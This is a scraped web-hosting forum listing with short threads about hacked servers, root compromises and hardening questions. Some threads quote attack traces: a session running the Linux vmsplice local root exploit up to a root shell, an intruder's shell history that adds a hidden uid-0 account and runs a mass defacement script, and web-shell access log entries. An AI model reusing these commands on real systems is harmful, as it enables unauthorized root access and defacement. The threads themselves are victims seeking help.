Web Hosting :: Linux System Compromised, Hacker In As "root"

Hacker Got Root Password
I'm still trying to figure this one out. I got an email last night about 10:30pm that a weird IP had logged with root. I thought it was a guy that helps with tech things but I ran the IP... it came back from Korea and I knew I was in trouble. I immediately logged into WHM and changed the root password then sent the server down for a reboot. He was only in there for about 3 minutes before I nailed him. I've banned the IP from the server and have been watching it for nearly 12 hours now and they haven't came back yet.

Now comes the task of trying to figure out how he got the password. This is mind boggling to me. He knew the password, like someone gave it to him... there were no incorrect guesses or brute force. The password was a series of random letters, both upper and lower case. Is it possible he got it through getting to /etc/passwd via a PHP script? I have open basedir restrictions in place, can they get around that? I noticed at the time he logged in there were several IPs trying to exploit PHP scripts on my server, you know, setting the parameters to txt files but I assumed with shell functions disabled (except exec) and with open basedir this wouldn't be possible. Is there a hole in cpanel / PHP / kernel recently I may have missed?

View Replies! View Related

Linux Server Compromised
Linux Fedora 5

I just got a letter from my dedicated host stating we had just been compromised. These servers just were set up last week! And there is nothing on them yet. The only thing I have done is modified the /etc/hosts file via SSH.

My servers are not even public yet. Can SSH'ing in from an unsecured wireless network make me vulnerable?

What do you guys think? Best way not to let this happen again?

Oh this is great :-| He's still logged in!

[root@server~]# who
root pts/0 2007-06-06 07:12 (xxx)
test pts/2 2007-06-06 03:08 (81.89.10.92)

View Replies! View Related

Linux System
I am planning to start linux hosting but don't have much knowledge about linux Operating system... can I do this without having sufficient knowledge of linux background?

Also please suggest me some good links from where I can get basic linux command and some kind of flash tutorials from which I get to know how to do work in Appache and dns etc.

how to download tar file using Terminal,

View Replies! View Related

Rescue Linux System - UK Datacenter
Does rapidswitch and poundhost offer Rescue Linux System on their portal?

I want to load a linux distro on server RAM and do my own FreeBSD installation.

View Replies! View Related

Learning Linux System Administration
Where would someone go to learn Linux System Administration?

Are the Redhat courses worthwhile?

View Replies! View Related

Determining Operating System (Linux)
Without having all of the operating systems at my disposal for testing, I would like to figure out a way to determine the operating system of a remotely accessed Linux machine.

It seems pretty strange though, since cPanel reports both machines I am using as being

CENTOS Enterprise 4.5 i686, yet one's uname -a reports:

Code:
Linux hostsentry.crucialwebhost.com 2.6.9-023stab044.4-enterprise #1 SMP Thu May 24 17:41:23 MSD 2007 i686 i686 i386 GNU/Linux

Code:
Linux main.7kb.org 2.6.9-55.0.6.ELsmp #1 SMP Tue Sep 4 21:36:00 EDT 2007 i686 i686 i386 GNU/Linux
I'm assuming there is a way to determine the OS from this information. Anyone know how?

View Replies! View Related

Apache Document Root On Linux
Basic question: does it matter where I set the document root for apache on a Linux system? I've googled this but haven't found a good answer.

This is for a VPS server running the Ubuntu (Debian) server os that I'm configuring. I'd prefer to simply create a new directory off the root and set that as the document root in the apache config file. Would this present any kind of security issue?

If that's no good, what's the best choice -- stick to the default?

View Replies! View Related

Linux Vmsplice Local Root Exploit (2.6.17 - 2.6.24.1)
Get ready for another round of patching and reboots. See:
[url]

Linux vmsplice Local Root Exploit
By qaaz
Linux 2.6.17 - 2.6.24.1

Debian also has a report but I'm trying to avoid linking to the source of the exploit. It works on 2.6.24, but only once. Then the box kernel panics (did for me). 2.6.24.1 is out as of couple days ago, but I'm not sure if it's still vulnerable. Seems like it is.

luki@tester:/tmp$ gcc t.c -o t
luki@tester:/tmp$ ./t
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e6f000 .. 0xb7ea1000
[+] root
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@tester:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@tester:/tmp#

View Replies! View Related

Which Linux Family Operating System Is More Stable
I would like to know which Linux family Operating System is more stable and have a better support for a Dedicated Server .....?

View Replies! View Related

How To Install ASSP On Linux System Without Cpanel?
How to install ASSP on linux system without cpanel.

View Replies! View Related

Latest Linux Gives Untrusted Users Root Access
Quote:

A software developer has uncovered a bug in most versions of Linux that could allow untrusted users to gain complete control over the open-source operating system.

The null pointer dereference flaw was only fixed in the upcoming 2.6.32 release candidate of the Linux kernel, making virtually all production versions in use at the moment vulnerable. While attacks can be prevented by implementing a common feature known as mmap_min_addr, the RHEL distribution, short for Red Hat Enterprise Linux, doesn't properly implement that protection, Brad Spengler, who discovered the bug in mid October, told The Register.

Read the complete article at The Register. New kernels are available for Redhat and CentOS (obviously), and likely others who may be affected.

View Replies! View Related

Are Chained Root Ssl Certificates More Secure Than Single Root?
I have read that although chained root ssl certificates can be more difficult to install they are actually more secure since the root certificate cannot be compromised, only the intermediary.

Is this true? It looks like both google and amazon both use chained SGC certs.

View Replies! View Related

Possible Compromised Server
I can resolve this situation I have.

I sent a server I have with a provider to have a RAM upgrade yesterday at 15:33 UTC, and ever since then I have had no access to my server.

SSH has been changed back to port 22, from a random high port.
root password has changed
RSA key has changed too.

I can see 3 possable reasons for this:

1) It's a different server plugged into the rack/router or a stolen IP

2) My provider "kindly" formatted and reinstalled my OS.

3) I have a compromised server, I very much doubt this as the server was offline.

I informed my provider about 18 hours ago that I had a "possable compromised server" and since then I have been given the run around as to what is happening.

For the last couple hours or so I have been trying to get them on live chat, which shows as online, but no-one answers. Thats another pet hate of mine.

I also have a couple tickets open asking for an update as they are not answering my origional ticket with updates.

Am I just being impaitent wanting a resolution to this in less than 18 hours or am I correct to complain?

View Replies! View Related

Is My Server Compromised
I am trying to determine if i am hacked, here is details:

I just got a message from softlayer support: ABUSE - 66.228.xxx,xxx - HACKING/MALICIOUS ACTIVITY - IMMEDIATE ACTION REQUIRED. with some log like this:
Quote:

Connection attempt to TCP IP.IP.IP.34:80
>from 66.228.xxx.xxx:41212 flags:0x02 Sep 28 14:05:55 PDT kernel:

Also, I did a rkhunter scan and found:

Quote:

cat /var/log/rkhunter.log | grep Warning
[18:26:29] /usr/bin/GET [ Warning ]
[18:26:29] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
[18:26:29] /usr/bin/groups [ Warning ]
[18:26:29] Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
[18:26:30] /usr/bin/ldd [ Warning ]
[18:26:30] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
[18:26:35] /usr/bin/whatis [ Warning ]
[18:26:35] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
[18:26:36] /sbin/ifdown [ Warning ]
[18:26:36] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[18:26:36] /sbin/ifup [ Warning ]
[18:26:36] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable

[18:27:43] Checking '/etc/xinetd.d/ftp_psa' for enabled services [ Warning ]
[18:27:44] Checking '/etc/xinetd.d/poppassd_psa' for enabled services [ Warning ]
[18:27:44] Checking '/etc/xinetd.d/smtp_psa' for enabled services [ Warning ]
[18:27:44] Checking '/etc/xinetd.d/smtps_psa' for enabled services [ Warning ]
[18:27:44] Checking for enabled xinetd services [ Warning ]
[18:27:44] Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa
[18:27:44] Warning: Found enabled xinetd service: /etc/xinetd.d/poppassd_psa
[18:27:44] Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_psa
[18:27:44] Warning: Found enabled xinetd service: /etc/xinetd.d/smtps_psa

[18:27:59] Checking for hidden files and directories [ Warning ]
[18:27:59] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression

[18:27:34] Checking running processes for deleted files [ Warning ]
[18:27:34] Warning: The following processes are using deleted files:
[18:27:34] Process: /usr/libexec/mysqld PID: 4773 File: /tmp/ib2RpbEj
[18:27:34] Process: /usr/sbin/httpd PID: 8449 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 8452 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 12102 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 12950 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 13044 File: /tmp/.apc.PGGxew
[18:27:34] Process: /usr/sbin/httpd PID: 13046 File: /tmp/.apc.PGGxew

So does that mean my server was compromised?

View Replies! View Related

Server Compromised (ensim_sshd), What To Do
I receive reports from my DC that my server is launching some hacking / malicious activity. This is the log that they provide:

Quote:

>
> Aug 20 12:34:35 ensim sshd[30628]: Did not receive identification
> string from MY.SERVER.IP
>
> Aug 20 12:44:23 ensim sshd[444]: Failed password for admin from
> MY.SERVER.IP port 57896 ssh2
>
> Aug 20 12:44:23 ensim sshd[444]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:26 ensim sshd[445]: Failed password for root from
> MY.SERVER.IP port 58029 ssh2
>
> Aug 20 12:44:26 ensim sshd[445]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:28 ensim sshd[446]: Failed password for root from
> MY.SERVER.IP port 58141 ssh2
>
> Aug 20 12:44:28 ensim sshd[446]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:31 ensim sshd[449]: Failed password for root from
> MY.SERVER.IP port 58276 ssh2
>
> Aug 20 12:44:31 ensim sshd[449]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:33 ensim sshd[450]: Failed password for root from
> MY.SERVER.IP port 58421 ssh2
>
> Aug 20 12:44:33 ensim sshd[450]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:36 ensim sshd[453]: Failed password for root from
> MY.SERVER.IP port 58565 ssh2
>
> Aug 20 12:44:36 ensim sshd[453]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:38 ensim sshd[455]: Failed password for root from
> MY.SERVER.IP port 58672 ssh2
>
> Aug 20 12:44:38 ensim sshd[455]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:41 ensim sshd[456]: Failed password for root from
> MY.SERVER.IP port 58787 ssh2
>
> Aug 20 12:44:41 ensim sshd[456]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:43 ensim sshd[457]: Failed password for root from
> MY.SERVER.IP port 58961 ssh2
>
> Aug 20 12:44:43 ensim sshd[457]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:46 ensim sshd[458]: Failed password for root from
> MY.SERVER.IP port 59132 ssh2
>
> Aug 20 12:44:46 ensim sshd[458]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:48 ensim sshd[459]: Failed password for root from
> MY.SERVER.IP port 59348 ssh2
>
> Aug 20 12:44:48 ensim sshd[459]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:51 ensim sshd[465]: Failed password for root from
> MY.SERVER.IP port 59495 ssh2
>
> Aug 20 12:44:51 ensim sshd[465]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:53 ensim sshd[466]: Failed password for admin from
> MY.SERVER.IP port 59622 ssh2
>
> Aug 20 12:44:53 ensim sshd[466]: Received disconnect from
> MY.SERVER.IP: 11: Bye Bye
>
> Aug 20 12:44:56 ensim sshd[467]: Failed password for admin from
> MY.SERVER.IP port 59803 ssh2
>
> Aug 20 12:44:56 ensim sshd[467]: Received disconnect from
> MY.SERVER.IP: 11:

View Replies! View Related

How To Track Down A Compromised Php Script
I have a few shred hosting servers I run. One of them keeps getting listed on CBL. It is very frustrating. Does anyone have an tools, tips, or tricks on finding the compromised?

So far I have confirmed that a script is using PHP to send mail out bypassing the MTA. It is faking the HELO and impersonating a well known ISP.

I used a combination of tshark and netstat. tshark can show me the HELO and EHLO. When I see the wrong entry I cross check that with netstat to see what. So Netstat only shows that it was PHP not the script path.

Here are the commands I'm running:

Code:
nohup netstat -c -p -n -e | grep -i ":25" > /var/log/monitor/netstat-smtp.log &

nohup tshark -f "port 25 and src host XX.XX.XX.XX" > /var/log/monitor/tshark-smtp.log &
Then I grep for what I'm looking for:

grep -i "HELO" /var/log/monitor/tshark-smtp.log

Is there a way to get Netstat to show the script path or complete command that is establishing the connection? Currently these scripts are eating up memory to a point that other process or getting killed off.

I also tried to force all mail through the MTA, but When I enable SMTP_BLOCK in my firewall config I get and error:

*WARNING* Cannot use SMTP_BLOCK on this VPS as the Monolithic kernel does not support the iptables module ipt_owner - SMTP_BLOCK disabled.

If there is a better way I'm game. Maybe some IDS that can tell me more of what is going on with the server?

View Replies! View Related

Web Hosting Where Security Cannot Be Compromised
I have read many helpful feedbacks regarding choosing a reliable web host. Most of the concerns are centered around costs. However, I am more particular about the relative security of my website in addition to other perks such as space, speed and bandwidth. I rate my concerns on a 1-10 scale:

Security 9/10
Bandwidth 7.5/10
Disk space 6/10
E-mails, backups, etc: 8/10
Cost: 7/10

View Replies! View Related

Server Compromised – Steps For Recovery
one of the worst things (in hosting) has happened. I received a notice this morning from lfd (configserver) that someone had logged into my server as root and it wasn’t me.

Unfortunately I didn’t notice it until eight hours later so I have no idea (yet) what happened during that period. Thankfully I don’t have any really critical data on the system that could have been stolen.

I’m in the process of restoring from a full system backup right now. After that’s done I’m going to look to see what the differences are between the files from the backup and that on the comprised drive. I’m not sure if I’ll get anything useful from the diff but hopefully I’ll find a clue as to how they got root access.

Then of course I need to get my server back up. However, I don’t want to do this until I’ve taken some steps to identify how the individual got in and take some additional preventative steps.

Here’s what I am planning on doing:

1) Check to make sure all exposed services are patched and look at some security sites to see if there are any known vulnerabilities for these services. Anyone know which sites are good to look at?

2) Change firewall to only allow ssh access from a couple specific IP addresses.

3) Disable root ssh access so I have to login via a different account and perform sudos, etc.

4)?

I’ll also look for a good server-hardening guide to see if there are some obvious things I forgot to secure.

Do any of you find folks have any other suggestions or resources that I should check out?

View Replies! View Related

WHMCS Breach - Some 3.5.1 Downloads Were Compromised
I just received a fairly scary WHMCS notice, you can view the details here:

<<please don't paste the file names, there are accounts that may have these on them>>

What are your thoughts on the entire situation? Personally, I'm a tad fearful (luckily, I hadn't upgraded to the next version yet as I was letting the other users play beta-testers) given the fact that there wasn't any versioning / modification 'notification' system in place on their end.

I'm fearing further updates. In essence, my concern is that the WHMCS development team isn't entirely certain how they were backdoored or to what scale they were backdoored.

Are their own billing systems & servers hosted in the same environment, were our billing details also released? etc. I want to know the scale of the attack.

View Replies! View Related

Windows Server Password Compromised
My windows server 2003 server password has been changed. My host tells me they must reload the entire OS in order to fix it..

Is there no way they can go in and rescue my server? Would save me alot of work.

View Replies! View Related

Server Compromised, Where To Get A Good Sysadmin
So one of the sites on our box was compromised earlier today.

We've shut it down for now and contacted our sysadmin to help research the problem. Not sure if he will be able to really help much as he's only done updates and such in the past.

Any idea of quality sysadmins who might be able to investigate the box and the site?

View Replies! View Related

Compromised Windows 2003 Server
I have been trying to troubleshoot our Windows 2003 server for weeks, but have made no lead way. The following are the steps they take to breach the server.

“They” are able to create an account. Some used usernames they have created are: sysadmin, adm, mssqladm.

It is very odd, looking in the event viewer, they just appear to create accounts out of the blue, they don’t even login or attempt to login or anything, all the sudden it says, New Account Created.

“They” then change the password of the account they just created.

Then “They” assign themselves the following group permissions, ‘Users’, and ‘Administrators’. ** SHAKING MY HEAD ** How the bloody hell do they assign themselves Administrator rights?

Then the do a few different actions depending, often times they disabled the windows firewall, and change open ports, other times they simply just logoff, other times, they have placed Trojans horses and other malware in their temporary internet folder under their use folderr.

This has been a cat and mouse game for weeks, I catch the new account, and immediately delete it, and check the firewall and enable if needed, then run a full system scan with AVG and Prevx. Sometmies AVG finds Trojans and malware, other times its clears.

I have racked my brain, checked all running processes with google, and they are seem legit. I have updated everything in windows via windows update, we are running windows 2003 server SP2. I have looked at the users and groups and everything seems secure.

Do you have guys have any idea what is going on? I have feeling something is running internally, which is allowing them to create the accounts.

Is there a tool that tracks all currently running processes, and allows you to go look at the logs to see what exactly was running at a certain time?

View Replies! View Related

Compromised Account At Gnax.net
Ok...posting this here to hopefully get someone's attention at gnax.net.

I've written their abuse@gnax.net and engineer@gnax.net multiple times and even called into their support line and spoke with Stephen (or Steven). No one there seems to care.

They have a group of Vietnamese hackers on their network that are launching attacks from several of their servers. They also have a google phising site on one of the servers.

Spoke with Stephen at Gnax support and his answer was that it wasn't his job and I needed to send a e-mail to abuse. After telling him that I'd done that multiple times he basically said oh well that he didn't know what to do.

Seems like the admins of gnax.net are either very irresponsible, stupid or just ignorant.

Here are the URL's.

[url]

[url]

Just replace the 1's with t's and you can see for yourself. The fwooshnet.com attempts to download a trojan to your system so if you don't know what your doing don't visit either URL.

Hopefully admins from Gnax watch this forum.

View Replies! View Related

Hacker Dilema
i've got a couple of vps accounts and one got hacked today, i received a domain creation email for a domain i didn't create, password was "hackedonlyhost" and contact was not my email but someone elses. Root password was changed etc etc, but i managed to get control of the vps again.

Why am i posting this in the ded forum? because the email in the account setup was for a hosting company. I traced the ip to LT. I've found this guy on a couple of hacker forums (arabic, he's in egypt) also using his email at his hosting company.

So, whilst he may not be breaking LT rules at all do i bother contacting them to say they are providing services to hacker?

View Replies! View Related

Email Account Compromised: Tools For Analysing
whose has 5 email accounts and several computers Windows and Mac.

Some spam has been sent out to people in his address book. I received one and have the email headers.

What tools are there for identifying which account/machine has been compromised?

View Replies! View Related

Softlayer - Hacker Fix
For those who are still under the softlayer hacker abuse please note you will need to re-load your server. We got hit a 2nd time after thinking everything was clean. Anyhow, for those who got hit again, my team and another from WHT - forgot who made the original clean.php script...

anyhow, here is a tool to clean all the data for all of your users:Copy fixit.pl and clean4.php to a directory. IE: /home/yourusername

Change username "changeme" in fixit.pl to the username where clean4.php is located
execute fixit.pl: IE: perl fixit.pl. If you want to test this on one user uncomment the die statement. When you are ready to do the entire server comment the die statement.

fixit.pl (perl script) Author: Robert Saylor

#!/usr/bin/perl$config{'basepath'} .....

View Replies! View Related

Hacker Safe Host
As with many sites. my site was hacked recently. my host was so negative about this. they didn't notice the hack attempt although it took the hacker 9 hours to break through.

after that I made some search on my host to find that it is not a real host at all. they are just resellers to another company. I was very disappointed, Then I decided to go to a better host who can protect me from hackers.

I read some threads about 'hacker safe host' but they all in general don't give a real name of trusted 'anti-hackers' companies.

can you guide me to some of the famous hosts?

if you can't my friends got a VPS hosted with WestHost. he offered me to move my site to his VPS. is west host trusted about hackers?

View Replies! View Related

Php Version Vs Hacker
There Is Some Way That Hacker use a .htaccess file to change the php Version On The Server To use the Exploit
Look I Run A php Shell From My Server
[url]
You Can See From The picture that my php version is 5.2.6
then I Have upload the .htaccess To My server
the Version has been changed
look to other picture
[url]
You Can see The .htaccess file
And This Way Only Work If I have More Than one php Version on my server
How Can I Secure My server From This Way

View Replies! View Related

Dealing With A Persistent Hacker
I was checking my business server's IIS errors logs when I ran across the following error:

2007-05-19 08:21:10 00.000.000.00 2243 00.000.000.000 80 HTTP/1.1 GET

/w00tw00t.at.ISC.SANS.DFind 400 - Hostname -

Additional information about the those responsible for the hack attempts are as follows

(retrieved from domaintools.com):

CustName: ----------------(hidden by me)
Address: Private Address
City: Plano
StateProv: TX
PostalCode: 75075
Country: US
RegDate: 2005-08-27
Updated: 2005-08-27

Apparently this person was trying to use the dfind hacker tool to find vulnerabilities on my server. The IP address belongs to AT&T Yahoo; and I've already contacted them by email. I believe that subsequent hack attempts have originated from this IP, however, the IP address has been masked by the use of proxies. I think that this may be someone I know because the IP is only about an hours drive from me. I'm starting to suspect a disgruntled former client who has friends living where that IP's from.

Has anyone here had any similar experiences?

What do you think AT&T Yahoo's response will be?

Is there anything else I can do or should not do?

I am also considering reimaging my server because of system issues but I am concerned that would erase any information needed for investigative purposes. I have saved my log files, though, on a CD but I'm thinking that AT&T Yahoo or whoever investigates this needs the server as it is.

View Replies! View Related

1and1.com User Database Compromised, Sites Hacked
Even worse, they didn't even notice until I called. If you're a 1and1.com customer I recommend you change your username and password now!

I included some log snippets to help you make sure your account hasn't been compromised.

1and1.com hacked

View Replies! View Related

Plesk IIS WP User & Compromised Server
My server (using plesk 8.1 on windows 2003 server) has been compromised with some sort of rootkit and I'm investigating vulnerabilities. This server hosts some of my asp.net applications and I have to grant Modify Permission to IIS WP (iwam_plesk) user on Some subfolders (under Httpdocs folder for each domain). Is it a security problem? if yes, how else can I allow asp.net applications to write to, say, an Access db?

View Replies! View Related

How To Prevent Hacker Enter My Host
I want to ask about some tips to prevent my blog from hacker attack. My friends experience this and i dont want this happen to me. Is web hosting technical support can fix my host server if hacker break it out?

View Replies! View Related

How Would A Hacker Change A Cpanel Password
I'm having a problem with a hacker...using insecure scripts on my user's accounts he changes Cpanel passwords. I do not understand how a script running as user nobody would change a Cpanel password. Any ideas on that ?

I am using mod security (rules from gotroot.com), register_globals are disabled. I also disabled the password reset feature as I thought the hacker may be resetting the passwords and then reading the new password from the email account on the server using the insecure script.

Unfortunately this guy simply doesn't stop...he seems to have a reverse DNS list or something. He is only attacking accounts on one specific server of mine but I am pretty sure he doesn't have root access.

View Replies! View Related

Hacker :: Pages Showing Errors
It seems like someone has hacked into my server, and all of the pages for one of my domains are showing errors.

Each page on my site is showing a PHP inclusion error, each file on my site is trying to include an unknown file /tmp/blah.php for example which doesn't exist on my site, therefore creating errors and not showing my site.

I checked my site in ftp, it isn't in the code. So it is definitely in a server file somewhere.

What could be doing this? Its for a single domain only, I've created the file it is trying to include as a temporary fix, I have checked php.ini and there seems no reference to the included file there.

View Replies! View Related

Hacker Attack On <my Reseller Accounts>
I have two reseller accounts with Innohosting and a hacker has got into several sites on both accounts. I have contacted Innohosting and hopefully will get an explanation soon.

But as this is very serious, I want to put it out on this forum also.

At first I thought they must have cracked my FTP access, but they have got into several sites on both reseller accounts so they must have gained access to the server itself, I suspect.

how to stop these lowlifes striking

View Replies! View Related

Hacker Trying To Login SQL Server
My server is generating a lot of this logs and taking too much RAM of my server in the SQL process

How can I block an IP adress ?

Log Description:
Login failed for user 'sa'. [CLIENT: 199.227.13.134]

For more information, see Help and Support Center at [url]

View Replies! View Related

Mod_security- Hacker Still Upload File..
I just have someone uploading file via php on a website, i need a way to block that kind of attack via mod security?

can add in mod security to avoid this?

89.146.147.144 - - [17/Jan/2007:12:24:11 -0600] "GET /favicon.ico HTTP/1.1" 404 1002 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:23 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/&newdir=bh HTTP/1.1" 200 154634 [url]
x=************.***??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:32 -0600] "GET /XXXX/index.php?x=************.***?&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/ HTTP/1.1" 200 7444 [url
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:41 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/&newdir=************.*** HTTP/1.1" 200 8422 [url]
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"

View Replies! View Related

Hacked Vps, To Many Files, How To Detect Hacker
Sometime ago the DC told me there was too many files on server and I started to investigate what is was and i got info that some one hacked the server and was sending spam from it.

When I looked at the accounts in Direct Admin some of them had the contact email to some hacker so i deleted the emails and changed password on the DA account and the email of those accounts.

Still I got too many files all the time so the server goes down so i have to delete the spoolfile all the time like 10 times a day

Please help how do I detect from what account do the hacker operate?

Can I detect that somehow?

Is it possible to do some small script to detect this?

Is there any advanced module to DA that gives me the info?

View Replies! View Related

Hacker Detection On Apache Log Files
I have a client that is certain someone is trying to hack her web-portal. I need to set up something that will alert me on suspicious activity on the server. For example someone fiddling with requests trying to make SQL / shell .. injection and similar threats.

Does any tool (for example bash script with grep) exist that would parse the raw apache logs and report if something is suspicious. Apache logs don't show the POST data so I am talking to admin to setup dump_io apache mod that enables this.

Or am I going into wrong direction here and there is whole another way to do this? I searched the web and forums for anything like this and didn't find anything.

View Replies! View Related

Hacker Adds Malicious Code To All Html And Php Files
we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?

The problem:

On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.

Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.

On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.

We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.

What we have done to attempt to secure the server:
1) We have installed SuPhp.

2) We have ensured that all scripts on the affected websites are updated and running the latest versions.

3) We have changed all the passwords.

Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.

The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.

One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.

Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?

[url]

View Replies! View Related

Hacker Safe, TRUSTe, BBB And Trust Guard Seals
I am starting a online sotre. Someone told me to keep third party seals for good response.

Please recommend me which seals to be used
Hacker Safe, TRUSTe, BBB, and Trust Guard

I think Trust Guard seal give a multi package for all security,privacy and business verification. Shall people know it? Is it worth money?

View Replies! View Related

Any Info On Blocking The "Turkish Hacker"
One of my clients has a shared hosting account with a major hosting company. Their site was recently hacked by the "Turkish Hacker."

A quick web search indicates that this is a well known attacker, going back several years. (Of course, it could just be a copycat.)

The hosting company provided no help in identifying how the site was hacked, or how to prevent it in the future, other than saying "change your passwords."

Is there any information available on how this particular hacker penetrates a site? Are there precautions the hosting company should have taken and did not? Are their things the client can do, other than using secure passwords and changing them regularly?

View Replies! View Related

"JaMaYcKa" Hacker Strikes On My Server
All index.php and index.html files on my server have been replaced with the "JaMaYcKa" hackers page. I was reading on WHT, and just about 10 days ago this happened to another member here.

I am using seeksadmin for system administration, and coincidently the guy who was hacked 10 days ago was also using seeksadmin. I believe there was another member here a month ago who was also hacked by "JaMaYcKa", and he was also a seeksadmin customer. I am not blaming seeksadmin in any way, they have helped a lot and I hope they can get this resolved.

Does anyone have any information on how to reverse/fix this issue? I am no system admin, just to put that out there, hence the reason I hired seeksadmin.

Here is the .bash_history from what the "JaMaYcKa" hacker did,

Quote:

cd /
pwd
/usr/sbin/useradd -o -u 0 -g 0 r00t -p ******************
passwd r00t
rm -rf tmp/
cd tmp
ls -a
unzip 1.zip
perl mass.pl /tmp/index.html
exit

According the the history, he ran some mass.pl script which would cause all index.php/html files to be changed (I am assuming). I have already removed the user "r00t" as seen above is what he created.

Any info on how to get this reversed (and if anyone else was using seeksadmin, let me know if they resolved your issue). I am currently waiting for an update from seeksadmin, so I'll update you guys once they reply to the ticket. Also to note I am using whmcs which contained the root password to this server; another user mentioned in another thread that if you were using whmcs/mb/ce/etc a hacker could get your root password, which of course if the password was not encrypted or the script had a glitch, the hacker could easily get your root password.

View Replies! View Related

Root Vs Su Root
what is difference working as root and su root in SSH.?

Many recommend disabling logging as root, but lot many commands ( service, adduser, ifconfig and ...) are not working on the commandline under when logged as su. i feel like my hands are tied working as su root and many commands are not available.

why is it like that? is there any way i can feel comfortable logging as su similar like root login.

View Replies! View Related

After Su To Root
I have a problem that after i su to root, i can't use some commands:

Quote:

Last login: Fri Jul 13 10:38:55 2007 from 10.10.0.1
[admin@server ~]$ su
Password:
[root@server admin]# runlevel
bash: runlevel: command not found
[root@server admin]# service httpd restart
bash: service: command not found
[root@server admin]# service apf restart
bash: service: command not found

But when i come to that machine and log in, i can use those commands just fine. That machine is about 20 fts away from my desk.

View Replies! View Related

ROOT
I got into my root and i created a CS server BUT after closing my root from my home the cs server goes down. can u tell me how to fix this ? i cant keep my root open for a life time, how much bandwitch does a ful 20 man Pub use in a month average?

View Replies! View Related

Root Domain
I have a server that I have a few domains on, and I have a question about the root domain. I initially picked any old domain, so now all of my name servers are pointing to this one random domain. I have since purchased a few more premium domains, and am wondering if I should change the nameservers to be the more premium domains? Does this matter? Should I have my "main site" be the root domain? Just trying to understand what the implications could be for me.

View Replies! View Related

Slow System
Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.

Anytime I restart Apache, it loads quick for a few seconds then gets slow again...

Here are the top few processes listed on the process manager: .....

View Replies! View Related

Root Password
My computer's HDD crashed last night and I only have an old backup.

The problem is my new server's root password was stored there and it's 20 digits totally random password.

Is there any way to reset the server password by the dedicated server provider?

I haven't asked my provider yet.

View Replies! View Related

Email From Root
Daily i am getting this kind of emails from my VPS. I don;t understand this emails, can some one explain what is this.

------------------------------------------
